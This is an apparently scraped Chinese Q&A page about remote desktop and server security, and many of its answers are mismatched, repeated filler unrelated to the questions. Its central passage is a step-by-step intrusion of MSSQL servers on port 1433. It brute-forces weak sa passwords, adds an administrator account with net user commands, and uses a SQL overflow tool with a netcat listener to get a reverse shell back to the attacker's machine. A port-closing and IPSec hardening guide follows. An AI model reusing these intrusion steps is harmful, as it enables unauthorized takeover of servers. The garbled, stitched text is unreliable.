1、用两根塑料的绳子。
二、怎样才能实现远程桌面连接?对方不同意能不能执行远程桌面?1、用两根塑料的绳子。
三、开始运行那里可以运行那些1、用两根塑料的绳子。
四、怎样登陆1、用两根塑料的绳子。
五、如何做好服务器安全维护?1、Win+E键,打开“文件资源管理器”,点击左侧的“此电脑”。
六、网络上的“肉鸡“是什么意思啊?1、Win+E键,打开“文件资源管理器”,点击左侧的“此电脑”。
七、1433端口入侵及防范方法【为了梦想而努力吧】1、 是给远程管理MSSQL用的。
2、扫到了开放1433端口的主机用X-SCAN扫出了sa空口令主机用SQLTools连上了该用什么命令得到主机权限 扫描到sql弱口令了,用sqltools连接之后,你可以直接用以下命令在对方电脑上加入一个管理员账户!netuser用户名密码/add回车netlocalgroupadministrators用户名/add回车然后接着用那个sqltools上传一个开3389的程序!让其在对方电脑上自动运行!然后用终端登录器登录试试!一般登录器xp系统本身就有!当然你也可以像楼上说的那样!直接将guest账户激活,提升权限为管理员!。
3、scanport.exe查有1433的机器SQLScanPass.exe进行字典暴破(字典是关键)后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello溢出漏洞入侵。
4、nc-vv-l-p本机端口sqlhelloF.exe入侵ip1433本机ip本机端口(以上反向的,测试成功)sqlhelloz.exe入侵ip1433(这个是正向连接)久违的溢出工具用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢、143389。
5、可并没有报告说发现有弱口令,看来网管还算比较有责任心。
6、但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的大的“木马”。
7、通过观察,我发现只有在1433端口上下点工夫,想想办法。
8、何不用SQL2溢出工具试试?先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat-l-p99”,监听本地99端口。
9、接着该SQL2出马了。
10、再打开一个cmd窗口,键入“sql221*.*1*.*0”,其中21*.*是对方IP,1*.*是我自己的IP,回车后提示packagesentsuccessful。
11、再回过头去看看监听本地端口的netcat,已经变成了C、WinNTsystem32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。
12、。
13、关闭你的1433端口(MSSQL的1433端口)-附各种关闭端口方法MSSQL的1433端口,是给远程管理MSSQL用的,如果你的服务器无需用到1433端口,或者你只在服务器上直接管理,那么就把这个端口关掉吧,这个属于高危端口,很多黑客都是直接通过这个入侵。
14、方法有四种、简单的是在网卡TCP/IP协议的属性--高级--(TCP/IP筛选)里设置。
15、方法是、(设置)--(网络和拨号连接),右击(本地连接)--(属性)--TCP/IP协议--(属性)--(高级)--(选项)--(TCP/IP筛选)--(属性),在这里就可以设置端口的打开关闭。
16、但这里要吗就“全部允许”,要吗就“只允许”。
17、要把常用的端口都添加,否则,缺了那些端口,那些连网功能就没了,注意噢如果你是远程管理的服务器记得一定要把你的远程桌面端口,默认是3389添加进去,不然点确定后就断开了,只能叫机房人员帮你了。
18、使用IPSEC安全策略(这个方法麻烦一点)、IPSEC安全策略被誉为是WIN2000自带的‘防火墙’,不过它的RULE(规则)不是很直观罢了。
19、每一个RULE由两部分组成,“条件”与“行为”,思路是、当满足某个“条件”时就执行某个“行为”。
20、建立一个RULE一共需要四个步骤、(1)建立“条件”、(2)建立“行为”、(3)建立策略(RULE)群,把“条件”与“行为”连起来)、(4)击活策略。
21、(1)建立RULE(规则)示例,以端口445/TCP为例、打开(本地安全策略)--右击“IP安全策略,在本地机器”--“管理IP筛选器表和筛选器操作”--“管理IP筛选器列表”--“添加”。
22、随便写个“名称”和“描述”,方便自己记忆就行,什么都可以,例如写“禁止TCP445”。
23、然后“下一步”--“添加”--“下一步”--“源地址”选“任何IP地址”,“下一步”--“目标地址”选“自己的IP地址”,“下一步”--“选择协议类型”,选‘TCP’,“下一步”--选择“从任意端口”“到此端口”。
24、“到此端口”栏填“445”,“下一步”--“完成”(把“编辑属性”栏钩上再按“完成”。
25、在跳出的窗口中,可以选择是否“镜象”,此选项会把此规则用到源地址与目标地址相反的条件上去)。
26、这样,就完成了建立“条件”的工作了。
27、(2)回到上面的第三步“管理IP筛选器表和筛选器操作”--“管理筛选器操作”--“添加”--“下一步”--添写“名称”和“描述”,例如写“阻止”,“下一步”--选择“阻止”,“下一步”--“完成”(这里也有‘编辑属性’,不过没什么用的,建议不要选)。
28、建立“行为”完成了。
29、(3)建立RULE、回到“本地安全策略”--右击“IP安全策略,在本地机器”--“创建IP安全策略”--“下一步”--填写“名称”和“描述”,例如写上“我的防火墙”,“下一步”--取消“击活默认响应规则”选项的勾选,“下一步”--钩上“编辑属性”,“完成”。
30、--在跳出的属性窗体中的“规则”栏中,点击“添加”--“下一步”--‘下一步’--‘下一步’--到“身份验证方法”中,您可以选择使用WINDOWS2000默认值(第一项)、也可以选择使用自己定义的字符串(第三项)。
31、“下一步”--出现一个列表,在里面选择原来建立的“禁止TCP445”,“下一步”--到选择“行为”了,选择原来建立好的“阻止”,“下一步”--“完成”。
32、按“确定”,关闭属性窗口。
33、如果还要建立其他的RULE,可以双击原来建立好的“我的防火墙”策略,然后“添加”,重复上面的操作步骤就可以建立其他RULE。
34、(4)击活策略、在“本地安全策略”--点击“IP安全策略,在本地机器”->在右面的窗口,右击“我的防火墙”--点击“指派”就激活了。
35、此方法较为可靠,在不阻碍用户正常使用的情况下又可以阻止黑客的入侵。
36、只是操作有点麻烦。
37、实验所知、使用IPSEC安全策略与TCP/IP端口筛选可以禁止其他IP访问特定的端口或协议等,但不能停止端口的监听。
38、所以如果使用netstat命令或ACTIVEPORTS查看时仍能看到这些端口在监听,不过在其他IP的机子的确访问不到这些端口。
39、但如果您用环回地址(0.1)就会有异常现象出现,不过不用担心,其他的IP是无法访问到的。
40、在服务进程里,关闭一些系统不用的,可能存在危险的服务。
41、关闭了那些服务,就连同关闭了它对应的端口。
42、通过安装的第三方防火墙来关闭端口。
43、你在IDC干过,靠别叫别人干坏事哦/。
八、远程桌面连接快的方法1、安装一款远程控制软件,推荐使用网络人远程桌面控制软件,内含控制端跟被控制端,控制端安装在主控机,被控端安装在需要桌面远程连接的电脑。。
2、控制端跟被控制端新注册账号,很快不泄露隐私。。
3、需要远程桌面连接帮助的电脑登录控制端,帮助者在控制端登录。
4、控制放可以在控制端系统设置,按需要勾选,提高控制速度跟稳定性。
5、勾选被控机,在点开屏幕控制,就可以进行桌面连接。
6、软件还具有文件共享功能,视频通讯功能,远程开关机功能,可以满足各种远程桌面连接的需要。